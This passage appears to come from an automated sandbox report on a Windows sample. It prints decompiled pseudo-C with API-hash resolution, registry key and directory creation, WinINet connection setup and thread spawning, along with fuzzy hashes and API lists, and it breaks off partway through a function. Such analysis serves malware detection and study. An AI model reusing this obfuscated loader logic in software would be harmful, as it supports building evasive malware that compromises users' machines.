    • Opcode Fuzzy Hash: 7b110a552ead95d305b3e80e3887d95556957b0b802b8bb04bbc6efa0a364464
    • Instruction Fuzzy Hash: 360144769402247BDA009E999C42FDA375CEF45B65F040224FE28E72C2E661AD5186F1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E008175B0(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
    				intOrPtr _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char _v44;
    				char _v56;
    				intOrPtr _v64;
    				char _v68;
    				char _v80;
    				char _v92;
    				char _v104;
    				char _v116;
    				char _v128;
    				char _v140;
    				char _v152;
    				char _v164;
    				char _v176;
    				char _v188;
    				char _v200;
    				char _v216;
    				char _v234;
    				char _v272;
    				char _v792;
    				char _v1816;
    				void* _t165;
    				intOrPtr* _t169;
    				void* _t170;
    				void* _t176;
    				void* _t186;
    				void* _t211;
    				void* _t212;
    				signed int _t213;
    				signed int _t217;
    				signed int _t221;
    				signed int _t226;
    				void* _t228;
    				signed int _t231;
    				signed char _t235;
    				void* _t243;
    				signed char _t246;
    				signed int _t252;
    				void* _t256;
    				void* _t257;
    				void* _t259;
    				void* _t263;
    				void* _t267;
    				signed char _t269;
    				void* _t273;
    				signed char _t283;
    				void* _t296;
    				signed int _t298;
    				signed int _t302;
    				void* _t303;
    				signed char _t308;
    				void* _t310;
    				signed char _t312;
    				signed char _t316;
    				void* _t322;
    				signed char _t324;
    				void* _t325;
    				void* _t326;
    				signed char _t333;
    				signed char _t335;
    				intOrPtr _t340;
    				intOrPtr _t350;
    				signed int _t409;
    				intOrPtr _t464;
    				signed int _t465;
    				intOrPtr _t477;
    				intOrPtr _t498;
    				void* _t500;
    				void* _t505;
    				void* _t506;
    				void* _t508;
    				void* _t565;
    				void* _t574;
    				void* _t576;
    				void* _t579;
    
    				_t165 = E00801C50(0xa20123ac, 1, 0xffffffff); // executed
    				_t506 = _t505 + 0xc;
    				if(_t165 == 0) {
    					L2:
    					_t333 = 0;
    				} else {
    					E008103C0(0xffffffff); // executed
    					_t476 =  ==  ? 0x8026 : 0x801a;
    					_t169 = E0081F5C0(8, 0x3a5687);
    					_t508 = _t506 + 0xc;
    					_t170 =  *_t169(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v792); // executed
    					if(_t170 == 0) {
    						_t477 = E0081D310(0x3d0);
    						E00810420(__eflags, _t171 + 0xc); // executed
    						_t3 = _t477 + 0x1c; // 0x1c, executed
    						E00818A00(_t3);
    						_t4 = _t477 + 0xe6; // 0xe6
    						_v24 = _t4;
    						_v32 = _t477;
    						_t176 = E00808AE0(0x82efa8e);
    						_t335 = E008027A0(0x88);
    						E0081ACA0(__eflags, _t176, _v24, _t335 & 0x000000ff, E008027A0(0x84) & 0x000000ff);
    						_t8 = _t477 + 0xf8; // 0xf8
    						E0081CCD0(_t8); // executed
    						E008222D0( &_v56);
    						__eflags = _t335;
    						_t360 =  !=  ? 0x823826 : 0x823486;
    						_t186 = E0080F180( !=  ? 0x823826 : 0x823486,  &_v1816);
    						_t336 =  &_v792;
    						E0080FD50( &_v792,  &_v56, __eflags, _t186, 0); // executed
    						E008222D0( &_v200);
    						E0080FD50( &_v792,  &_v200, __eflags, 0, 0); // executed
    						E008222D0( &_v188);
    						E0080FD50( &_v792,  &_v188, __eflags, 0, 0); // executed
    						E008222D0( &_v176);
    						E0080FD50( &_v792,  &_v176, __eflags, 0, 0); // executed
    						E008222D0( &_v164);
    						E0080FD50(_t336,  &_v164, __eflags, 0, 0); // executed
    						E008222D0( &_v152);
    						E0080FD50(_t336,  &_v152, __eflags, 0, 1); // executed
    						E008222D0( &_v140);
    						E0080FD50(_t336,  &_v140, __eflags, 0, 1); // executed
    						E008222D0( &_v128);
    						E0080FD50(_t336,  &_v128, __eflags, 0, 0); // executed
    						E008222D0( &_v116);
    						E0080FD50(_t336,  &_v116, __eflags, 0, 0); // executed
    						E008222D0( &_v104);
    						E0080FD50(_t336,  &_v104, __eflags, 0, 0); // executed
    						E008222D0( &_v92);
    						E0080FD50(_t336,  &_v92, __eflags, 0, 0); // executed
    						E008222D0( &_v80);
    						E0080FD50(_t336,  &_v80, __eflags, 0, 0); // executed
    						_t211 = E0080F180(0x823690,  &_v272);
    						_t212 = E00808AE0(0x82efa8e);
    						_t213 = E008027A0(0x88);
    						E00813130(_t212, 0x80000001, _t211,  &_v234, _t213 & 0x000000ff, E008027A0(0x84) & 0x000000ff); // executed
    						_v20 = _v32 + 0x1fe;
    						_t217 = E008027A0(0x88);
    						E0081A9D0(0, _v32 + 0x3be, _t217 & 0x000000ff, E008027A0(0x84) & 0x000000ff);
    						_t221 = E008027A0(0x88);
    						E0081A9D0(0, _v32 + 0x3c7, _t221 & 0x000000ff, E008027A0(0x84) & 0x000000ff);
    						_t226 = E0080FD10( &_v792);
    						E00806CC0(__eflags, _t226, 1);
    						_t228 = E00822160( &_v56);
    						_v24 = _t226;
    						_t231 = E00804C00(E0081DC90(_t228 + 2 + _t226 * 2, 0xffffffff, _v20, 0x20), 0);
    						_t491 = _t231 & 0x00000001;
    						_t340 = _v32;
    						_v20 = _t340 + 0x25e;
    						_t235 = E0081DC90(E00822160( &_v200) + 2 + _t226 * 2, 0xffffffff, _v20, 0x20);
    						_t45 = _t491 + 1; // 0x1
    						__eflags = _t235;
    						_t462 =  !=  ? _t231 & 0x00000001 : _t45;
    						_v20 = _t340 + 0x27e;
    						_v20 = E0081DC90(E00822160( &_v188) + 2 + _v24 * 2, 0xffffffff, _v20, 0x20);
    						_v28 = _t340 + 0x29e;
    						_t243 = E0081DC90(E00822160( &_v176) + 2 + _v24 * 2, 0xffffffff, _v28, 0x20);
    						__eflags = _v20 - 1;
    						asm("adc edi, 0x0");
    						__eflags = _t243 - 1;
    						asm("adc edi, 0x0");
    						_t246 = E0081DC90(E00822160( &_v164) + 2 + _v24 * 2, 0xffffffff, _t340 + 0x2be, 0x20);
    						__eflags = _t246;
    						_v20 = E00802640(0,  !=  ? _t231 & 0x00000001 : _t45);
    						_v28 = _v32 + 0x21e;
    						_t252 = E00804C00(E0081DC90(E00822160( &_v152) + 2 + _v24 * 2, 0xffffffff, _v28, 0x20), 0);
    						_t256 = E0081DC90(E00822160( &_v140) + 2 + _v24 * 2, 0xffffffff, _v32 + 0x23e, 0x20);
    						_t257 = E00808AE0(0x1c6b4dea);
    						__eflags = _t256 - 1;
    						asm("adc ebx, 0x0");
    						_t464 = _v32;
    						_v20 = _t464 + 0x2de;
    						_t259 = E00822160( &_v128);
    						_t92 = _v24 * 2; // 0x2
    						__eflags = E0081DC90(_t259 + _t92 + 2, 0xffffffff, _v20, E00808AE0(0x82efaac)) - 1;
    						asm("adc ebx, 0x0");
    						_v20 = _t464 + 0x2fe;
    						_t498 = _t464;
    						_t263 = E00822160( &_v116);
    						_t465 = _v24;
    						__eflags = E0081DC90(_t263 + 2 + _t465 * 2, 0xffffffff, _v20, 0x20) - 1;
    						asm("adc ebx, 0x0");
    						_v28 = (0 | _t246 == 0x00000000) - _v20 + (_t252 & 0x00000001) - _t257 + 0x1445b766;
    						_v20 = _t498 + 0x31e;
    						_t267 = E00822160( &_v104);
    						_t108 = _t465 * 2; // 0x2
    						_t269 = E0081DC90(_t267 + _t108 + 2, 0xffffffff, _v20, E00808AE0(0x82efaac));
    						__eflags = _t269;
    						_v20 = _v28 - E00808AE0(0x6d4ac025) + (0 | _t269 == 0x00000000) + 0x65643aa9;
    						E00806CC0(__eflags, _v28, _t269 == 0);
    						_t350 = _t498;
    						_t273 = E00822160( &_v92);
    						_t121 = _v24 * 2; // 0x2
    						__eflags = E0081DC90(_t273 + _t121 + 2, 0xffffffff, _t498 + 0x33e, E00808AE0(0x82efaac));
    						_t500 = E00806CC0(E0081DC90(_t273 + _t121 + 2, 0xffffffff, _t498 + 0x33e, E00808AE0(0x82efaac)), _v20, 0 | E0081DC90(_t273 + _t121 + 2, 0xffffffff, _t498 + 0x33e, E00808AE0(0x82efaac)) == 0x00000000);
    						__eflags = E0081DC90(E00822160( &_v80) + 2 + _v24 * 2, 0xffffffff, _t350 + 0x35e, 0x20);
    						_t409 = 0 | __eflags == 0x00000000;
    						E00806CC0(__eflags, _t500, _t409);
    						_t283 = E0081DC90( &_v234, 0xffffffff, _t350 + 0x39e, 0x20);
    						_t565 = _t508 + 0x20c;
    						__eflags = _t283;
    						_t412 = (0 | __eflags == 0x00000000) + _t500 + _t409;
    						if(__eflags > 0) {
    							L14:
    							_t333 = 0;
    							__eflags = 0;
    						} else {
    							_t296 = E00808AE0(0x82eea8c);
    							_t298 = E0081B4E0(_t296, E00808AE0(0x82e0573));
    							_t302 = E008088A0(__eflags,  !(E00808AE0(0x82e0573) ^ _t298), _t298);
    							_t303 = E00808AE0(0x82eea8c);
    							 *(_t350 + 0x1fa) = E0081B4E0(_t303, E00808AE0(0x82e0573)) << 0x00000010 | _t302;
    							_t308 = E008173F0(_t412, __eflags, _t350); // executed
    							_t574 = _t565 + 0x30;
    							__eflags = _t308;
    							if(_t308 == 0) {
    								goto L14;
    							} else {
    								_t504 = _a4;
    								E00821F10( &_v44);
    								_t310 = E00822160(_a4);
    								_t312 = E00821090(__eflags, _t310,  &_v68, E00808AE0(0x82efa8e)); // executed
    								_t576 = _t574 + 0x10;
    								__eflags = _t312;
    								if(_t312 != 0) {
    									__eflags = _v64 + _v68;
    									E00822310( &_v44, _v68, _v64 + _v68); // executed
    									E00821580( &_v68); // executed
    									_t576 = _t576 + 4;
    								}
    								_t427 =  &_v44;
    								__eflags = E00822780( &_v44);
    								if(__eflags != 0) {
    									_t322 = E00822780( &_v44);
    									_t324 = E008170A0(__eflags,  &_v216, E00822A70( &_v44), _t322); // executed
    									_t579 = _t576 + 0xc;
    									__eflags = _t324;
    									if(__eflags != 0) {
    										E008185B0(_t324,  &_v216, __eflags); // executed
    									}
    									_t325 = E00822780( &_v44);
    									_t326 = E00822A70( &_v44);
    									_t427 =  &_v56;
    									E00820E00(E00822160( &_v56), __eflags, _t327, _t326, _t325); // executed
    									_t576 = _t579 + 0xc; // executed
    								}
    								E00816C60(_t427, __eflags); // executed
    								E00817E00(_t427, __eflags); // executed
    								_t316 = E0080CBA0();
    								__eflags = _t316;
    								if(_t316 != 0) {
    									E0081F5C0(0, 0xa0733d4);
    									CreateThread(0, 0, E0080EE40, E0080F960(E00822160(_t504), 0xffffffff), 0, 0); // executed
    								}
    								E008222B0( &_v44); // executed
    								_t333 = 1;
    							}
    						}
    						E00822960( &_v80);
    						E00822960( &_v92);
    						E00822960( &_v104);
    						E00822960( &_v116);
    						E00822960( &_v128);
    						E00822960( &_v140);
    						E00822960( &_v152);
    						E00822960( &_v164);
    						E00822960( &_v176);
    						E00822960( &_v188);
    						E00822960( &_v200);
    						E00822960( &_v56);
    					} else {
    						goto L2;
    					}
    				}
    				return _t333;
    			}

    APIs
      • Part of subcall function 0080FD50: CreateDirectoryW.KERNEL32(?,00000000), ref: 0080FDF3
      • Part of subcall function 00813130: RegCreateKeyExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,80000001,00000000,?,?,?), ref: 00813160
      • Part of subcall function 00813130: RegCreateKeyExW.KERNEL32(00000000,80000001,00000000,00000000,00000000,00000003,00000000,?,?), ref: 008131E2
      • Part of subcall function 00821090: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008210FB
    • CreateThread.KERNEL32(00000000,00000000,Function_0000EE40,00000000,00000000,00000000), ref: 00817D6A
      • Part of subcall function 00821580: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?), ref: 008215A4
      • Part of subcall function 00821580: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008215C7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Create$ChangeCloseDirectoryFileFindFreeNotificationThreadVirtual
    • String ID: BV^U
    • API String ID: 1065963300-3271193798
    • Opcode ID: 640c5499de0cc9c386c88f7a228e6a9af587e419ba22ee62751d7619f5a57847
    • Instruction ID: 2726512ce7750dd90c3ec463e6789e4132ae76b55b52134052160fed8e735230
    • Opcode Fuzzy Hash: 640c5499de0cc9c386c88f7a228e6a9af587e419ba22ee62751d7619f5a57847
    • Instruction Fuzzy Hash: C022C8B1E002296BDB10B6A8AC47FFE7268FF50714F440564F915E72C3FE716A8586A3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0081F5C0(signed int _a4, signed int _a8) {
    				signed int* _v20;
    				char _v52;
    				char _v564;
    				intOrPtr _t37;
    				signed char _t39;
    				signed int _t40;
    				intOrPtr* _t41;
    				intOrPtr* _t44;
    				struct HINSTANCE__* _t48;
    				void* _t55;
    				signed int _t58;
    				signed int _t66;
    				signed int _t67;
    				signed int _t68;
    				void* _t69;
    				void* _t79;
    
    				_t66 = _a8;
    				_t58 = _t66 - (_t66 * 0x3531dec1 >> 0x20 >> 7) * 0x268;
    				0;
    				0;
    				while(1) {
    					_t37 =  *((intOrPtr*)(0x825b3c + _t58 * 4));
    					if(_t37 == 0) {
    						break;
    					}
    					if(_t37 == _t66) {
    						return  *(0x8270c0 + _t58 * 4);
    					} else {
    						_t55 = E00802640(_t58, E00808AE0(0xf66d2cbf));
    						_t69 = _t69 + 0xc;
    						_t79 = _t58 - 0x266;
    						_t58 = 0;
    						if(_t79 <= 0) {
    							_t58 = _t55 + 0xfe43d634;
    						}
    						continue;
    					}
    				}
    				_v20 = 0x825b3c + _t58 * 4;
    				_t67 = _a4;
    				__eflags = _t67 - 0x23;
    				if(__eflags > 0) {
    					L40:
    					_t65 =  *(0x825a74 + _t67 * 4);
    					_t39 = E0080B6D0(__eflags,  *(0x825a74 + _t67 * 4), 0);
    					__eflags = _t39 & 0x00000001;
    					if((_t39 & 0x00000001) == 0) {
    						L50:
    						_t68 = _a8;
    						_t40 = E0081F870(_t65, _t68);
    						__eflags = _t40;
    						if(_t40 == 0) {
    							_t41 = E0081F5C0(0, 0xba94474);
    							 *_t41(0);
    							_t40 = 0;
    							__eflags = 0;
    						}
    						L52:
    						 *_v20 = _t68;
    						 *(0x8270c0 + _t58 * 4) = _t40;
    						return _t40;
    					}
    					__eflags = _t67 - 0x17;
    					if(_t67 == 0x17) {
    						_t65 =  *0x8270b4; // 0x0
    						__eflags = _t65;
    						if(_t65 != 0) {
    							L49:
    							 *(0x825a74 + _a4 * 4) = _t65;
    							goto L50;
    						}
    						L47:
    						_t44 = E0081F5C0(0, 0xba94474);
    						 *_t44(0);
    						 *(0x825a74 + _a4 * 4) = _t65;
    						_t40 = 0;
    						_t68 = _a8;
    						goto L52;
    					}
    					__eflags = _t67 - 0x16;
    					if(_t67 == 0x16) {
    						_t65 =  *0x825114; // 0x0
    						__eflags = _t65;
    						if(_t65 == 0) {
    							goto L47;
    						}
    						goto L49;
    					}
    					__eflags = _t67 - 0x15;
    					if(_t67 != 0x15) {
    						_t48 = LoadLibraryA( &_v52); // executed
    						_t65 = _t48;
    						__eflags = _t65;
    						if(_t65 != 0) {
    							goto L49;
    						}
    						goto L47;
    					}
    					_t65 =  *0x825140; // 0x0
    					__eflags = _t65;
    					if(_t65 != 0) {
    						goto L49;
    					}
    					goto L47;
    				}
    				switch( *((intOrPtr*)(_t67 * 4 +  &M0082338C))) {
    					case 0:
    						L39:
    						E008059B0( &_v52, E00801250(0x823f44,  &_v564), 0xffffffff);
    						_t69 = _t69 + 0x14;
    						goto L40;
    					case 1:
    						goto L39;
    					case 2:
    						__eax = 0x82347b;
    						goto L39;
    					case 3:
    						__eax = 0x823aa8;
    						goto L39;
    					case 4:
    						__eax = 0x82353c;
    						goto L39;
    					case 5:
    						__eax = 0x823b84;
    						goto L39;
    					case 6:
    						__eax = 0x8237c4;
    						goto L39;
    					case 7:
    						__eax = 0x823468;
    						goto L39;
    					case 8:
    						__eax = 0x82352d;
    						goto L39;
    					case 9:
    						__eax = 0x8239f8;
    						goto L39;
    					case 0xa:
    						__eax = 0x823508;
    						goto L39;
    					case 0xb:
    						__eax = 0x82377a;
    						goto L39;
    					case 0xc:
    						__eax = 0x823424;
    						goto L39;
    					case 0xd:
    						__eax = 0x823a1d;
    						goto L39;
    					case 0xe:
    						__eax = 0x8239e7;
    						goto L39;
    					case 0xf:
    						__eax = 0x8239d2;
    						goto L39;
    					case 0x10:
    						__eax = 0x823940;
    						goto L39;
    					case 0x11:
    						__eax = 0x823830;
    						goto L39;
    					case 0x12:
    						__eax = 0x8239df;
    						goto L39;
    					case 0x13:
    						__eax = 0x8240bc;
    						goto L39;
    					case 0x14:
    						__eax = 0x8237cf;
    						goto L39;
    					case 0x15:
    						goto L40;
    					case 0x16:
    						__eax = 0x82383d;
    						goto L39;
    					case 0x17:
    						__eax = 0x823522;
    						goto L39;
    					case 0x18:
    						__eax = 0x82401a;
    						goto L39;
    					case 0x19:
    						__eax = 0x82408a;
    						goto L39;
    					case 0x1a:
    						__eax = 0x823a05;
    						goto L39;
    					case 0x1b:
    						__eax = 0x82409c;
    						goto L39;
    					case 0x1c:
    						__eax = 0x8240aa;
    						goto L39;
    					case 0x1d:
    						__eax = 0x823a12;
    						goto L39;
    					case 0x1e:
    						__eax = 0x8235cc;
    						goto L39;
    					case 0x1f:
    						__eax = 0x82400e;
    						goto L39;
    					case 0x20:
    						__eax = 0x823f38;
    						goto L39;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: LibraryLoad
    • String ID: VD
    • API String ID: 1029625771-1791571226
    • Opcode ID: e26d0abd3ec0233b019d8d419052fc6eb67851b3f3232d6f94075c623a951f01
    • Instruction ID: d2149930e6554a8151539344d98929425d4584c7994fef5ba9001c4b1ca7e14c
    • Opcode Fuzzy Hash: e26d0abd3ec0233b019d8d419052fc6eb67851b3f3232d6f94075c623a951f01
    • Instruction Fuzzy Hash: 8A51E2696081A997CB105E987C51AE5225CFF8131CF244932BB2BDB3E3EB34CEC55752
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0080FD50(void* __ecx, intOrPtr __edx, void* __eflags, char* _a4, char _a8) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				char _v54;
    				short _v56;
    				char _v576;
    				signed char _t14;
    				void* _t15;
    				signed int _t16;
    				signed char _t17;
    				int _t19;
    				void* _t23;
    				WCHAR* _t28;
    				void* _t34;
    				char* _t35;
    				void* _t38;
    				void* _t39;
    				void* _t43;
    				void* _t44;
    
    				_v20 = __edx;
    				_t34 = __ecx;
    				_t35 = _a4;
    				_v56 = 0;
    				_t14 = E008067E0(_t35, 0);
    				_t39 = _t38 + 8;
    				_t47 = _t14 & 0x00000001;
    				if((_t14 & 0x00000001) != 0) {
    					_t35 =  &_v56;
    					_v56 = 0x2e;
    					E0081ACA0(_t47, 0,  &_v54, 2, 3);
    					_t39 = _t39 + 0x10;
    				}
    				_v24 = _t35;
    				_t15 = E00808AE0(0x82efa8e);
    				_t16 = E008027A0(0x8f);
    				_t17 = E008027A0(0x89);
    				_t28 =  &_v576;
    				_t19 = E0080DBE0(_t15, _t34, _t28, 0, _t16 & 0x000000ff, _t17 & 0x000000ff); // executed
    				_t43 = _t39 + 0x24;
    				if(_t19 != 0) {
    					E0081F5C0(0, 0x3087237);
    					_t44 = _t43 + 8;
    					_t19 = CreateDirectoryW(_t28, 0); // executed
    					if(_t19 != 0) {
    						_t50 = _a8;
    						if(_a8 != 0) {
    							E008126A0(_t50, _t28, 1, 1); // executed
    							_t44 = _t44 + 0xc;
    						}
    						E00822250(0x104);
    						_t23 = E0080DBE0(0, _t28, E00822160(_v20), _v24, 3, 5); // executed
    						return _t23;
    					}
    				}
    				return _t19;
    			}

    APIs
    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0080FDF3
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CreateDirectory
    • String ID: .
    • API String ID: 4241100979-248832578
    • Opcode ID: 7297e3586b42db68d178466448ffdd7a598212c52d80c3342f42a5a221b12e1c
    • Instruction ID: d2318cd4849b871ec29ccc4b0726cc0c86d69a8747dcc8c2bd3bc29be2f15c2c
    • Opcode Fuzzy Hash: 7297e3586b42db68d178466448ffdd7a598212c52d80c3342f42a5a221b12e1c
    • Instruction Fuzzy Hash: 272195A1E4131436FA20B698AC4BFBF3658EF54755F044060FA08AA2C3F6E55B5482A3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E0080ECF0(void* __eax, void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, intOrPtr _a16) {
    				void* _v20;
    				signed int _t14;
    				void* _t16;
    				void* _t17;
    				intOrPtr* _t18;
    				void* _t20;
    				intOrPtr* _t22;
    				void* _t25;
    				intOrPtr _t30;
    				long _t31;
    				char* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t36;
    				void* _t39;
    				void* _t41;
    
    				_t41 = __eflags;
    				_t30 = _a4;
    				E0081F5C0(0x13, 0xd0ca371);
    				_t14 = E008088A0(_t41,  !(E008074F0(_t41, _a16, 0xffffffff)) & 0x00000001, 0xffffffff);
    				_t39 = _t36 + 0x18;
    				_t27 =  !=  ? _t30 : 0x823f80;
    				_t16 = InternetOpenA( !=  ? _t30 : 0x823f80, _t14 ^ 0x00000001, 0, 0, 0); // executed
    				if(_t16 == 0) {
    					L6:
    					_t17 = 0;
    				} else {
    					_t25 = 0;
    					_t31 = 3;
    					_v20 = _t16;
    					_t34 = 0x823b24;
    					0;
    					do {
    						_t18 = E0081F5C0(0x13, 0x5b4d601);
    						_t39 = _t39 + 8;
    						_t4 = _t34 - 4; // 0x2
    						 *_t18(_v20,  *_t4, _t34, 4);
    						_t25 = _t25 + 1;
    						_t34 = _t34 + 8;
    						_t31 = _t31 - 1;
    					} while (_t31 != 0);
    					_t35 = _v20;
    					_t32 = _a8;
    					_t20 = E0080A9B0(_t32);
    					_t39 = _t39 + 4;
    					_t17 = 0;
    					if(_t20 > 0) {
    						E0081F5C0(0x13, 0xae775e1);
    						_t39 = _t39 + 8;
    						_t17 = InternetConnectA(_t35, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
    						if(0 == 0) {
    							_t22 = E0081F5C0(0x13, 0x714b685);
    							_t39 = _t39 + 8;
    							 *_t22(_t35);
    							goto L6;
    						}
    					}
    				}
    				return _t17;
    			}

    APIs
    • InternetOpenA.WININET(00823F80,00000000,00000000,00000000,00000000,?,?,?,?,?,008192FD,?,?,?,00000001,00000000), ref: 0080ED3E
    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0080EDB8
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Internet$ConnectOpen
    • String ID:
    • API String ID: 2790792615-0
    • Opcode ID: 4ce3f8242324ab21604f84bf0ad1e5eb89adf62e79dc6533693882aed01049d4
    • Instruction ID: 09f5536fc52e8a3c4084a4ef1847c74bd267ab03d19335d14ed83471cb63490c
    • Opcode Fuzzy Hash: 4ce3f8242324ab21604f84bf0ad1e5eb89adf62e79dc6533693882aed01049d4
    • Instruction Fuzzy Hash: DF2108B2B8031537FE205AA46C13FAF355DEB91724F140534FE18F62C2E5A5AA0041B6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00812A80(void* __eflags) {
    				long _v20;
    				WCHAR* _v24;
    				struct HINSTANCE__* _v28;
    				WCHAR* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v60;
    				intOrPtr _v72;
    				char _v76;
    				char _v96;
    				char _v116;
    				char _v138;
    				void* _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t27;
    				int _t34;
    				int _t35;
    				int _t36;
    				WNDCLASSW* _t41;
    
    				_t18 = E00808AE0(0x82efaa4);
    				_t41 =  &_v76;
    				E0080AF10(_t41, _t18);
    				_v72 = E008108C0;
    				_t20 = E0081F5C0(0, 0xa39ecc7);
    				_v60 =  *_t20(0);
    				_v40 = E0080F180(0x823790,  &_v96);
    				E0081F5C0(1, 0x38227e7);
    				RegisterClassW(_t41); // executed
    				_v36 = E0081F5C0(1, 0xf3c7b77);
    				_t27 = E0081F5C0(0, 0xa39ecc7);
    				_v28 =  *_t27(0);
    				_v32 = E0080F180(0x823810,  &_v138);
    				_v24 = E0080F180(0x823790,  &_v116);
    				_v20 = E00808AE0(0x8e1fa8c);
    				_t34 = E00808AE0(0x882efa8c);
    				_t35 = E00808AE0(0x882efa8c);
    				_t36 = E00808AE0(0x882efa8c);
    				return CreateWindowExW(0, _v24, _v32, _v20, _t34, _t35, _t36, E00808AE0(0x882efa8c), 0, 0, _v28, 0);
    			}

    APIs
    • RegisterClassW.USER32(?), ref: 00812AE4
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    • CreateWindowExW.USER32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00812B9B
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: ClassCreateLibraryLoadRegisterWindow
    • String ID:
    • API String ID: 3459329703-0
    • Opcode ID: f0ffd27a2bc17829207ae931d750acb50e2a1cccb294c583fb43acefa24b11ea
    • Instruction ID: ec34308b00a24bd891f4f1ad82d3263fad4916e94a36fec755ec37f7c8557fcd
    • Opcode Fuzzy Hash: f0ffd27a2bc17829207ae931d750acb50e2a1cccb294c583fb43acefa24b11ea
    • Instruction Fuzzy Hash: 392121B6D402146EEB50ABE46C03FFE7A68FF15705F140031FA09E5283F9A116558BB3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00813130(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
    				void* _v20;
    				signed int _v24;
    				signed int _v28;
    				void* _v32;
    				int _v36;
    				long _t19;
    				signed int _t24;
    				long _t27;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				void* _t33;
    				short* _t38;
    				void* _t41;
    				void* _t42;
    				void* _t46;
    
    				E0081F5C0(9, 0x7b43ce7);
    				_t42 = _t41 + 8;
    				_t19 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
    				_t33 = 0;
    				_t48 = _t19;
    				if(_t19 == 0) {
    					_v28 = _a24 & 0x000000ff;
    					_v24 = _a20 & 0x000000ff;
    					do {
    						_t38 = _a16;
    						E0081ACA0(_t48, _a4, _t38, _v24, _v28);
    						_t24 = E00808AE0(0x82efa85);
    						E0081F5C0(_t24, E00808AE0(0xf9ac66b));
    						_t46 = _t42 + 0x20;
    						_t27 = RegCreateKeyExW(_v20, _t38, 0, 0, 0, 3, 0,  &_v32,  &_v36); // executed
    						if(_t27 != 0) {
    							goto L2;
    						} else {
    							_t31 = E0081F5C0(9, 0x3111c69);
    							_t46 = _t46 + 8;
    							 *_t31(_v32);
    							if(_v36 != 1) {
    								goto L2;
    							} else {
    								_t33 = 1;
    							}
    						}
    						L7:
    						_t29 = E0081F5C0(9, 0x3111c69);
    						 *_t29(_v20);
    						goto L8;
    						L2:
    						E00806CC0(__eflags, _t33, 1);
    						_t42 = _t46 + 8;
    						_t33 = _t33 + 1;
    						__eflags = _t33 - 0x64;
    					} while (__eflags != 0);
    					_t33 = 0;
    					__eflags = 0;
    					goto L7;
    				}
    				L8:
    				return _t33;
    			}

    APIs
    • RegCreateKeyExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,80000001,00000000,?,?,?), ref: 00813160
    • RegCreateKeyExW.KERNEL32(00000000,80000001,00000000,00000000,00000000,00000003,00000000,?,?), ref: 008131E2
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Create
    • String ID:
    • API String ID: 2289755597-0
    • Opcode ID: 07fb853be87c9ae89001baf86720459e6f413f576804172a7871d48516b79038
    • Instruction ID: 51fb37b4a732c53934cd67f8c5532365adb03b27cfc1f7d69d5023929aac9759
    • Opcode Fuzzy Hash: 07fb853be87c9ae89001baf86720459e6f413f576804172a7871d48516b79038
    • Instruction Fuzzy Hash: D521D3B1E403157FEB10AA949C43FEF3A2CFF55715F140034FA15B51C2F6A2AA5486B6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00820E00(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
    				long _v20;
    				long _t15;
    				long _t17;
    				void* _t18;
    				signed char _t20;
    				intOrPtr* _t21;
    				int _t25;
    				long _t26;
    				long _t27;
    				signed char _t28;
    				void* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t39;
    				void* _t41;
    
    				E0081F5C0(0, 0xad68947);
    				_t15 = E00808AE0(0x482efa8c);
    				_t26 = E00808AE0(0x82efa8e);
    				_t17 = E00808AE0(0x82efa0c);
    				_t39 = _t35 + 0x14;
    				_t18 = CreateFileW(_a4, _t15, 1, 0, _t26, _t17, 0); // executed
    				if(_t18 == 0xffffffff) {
    					_t27 = 0;
    					L9:
    					return _t27;
    				}
    				_t34 = _t18;
    				_t32 = _a8;
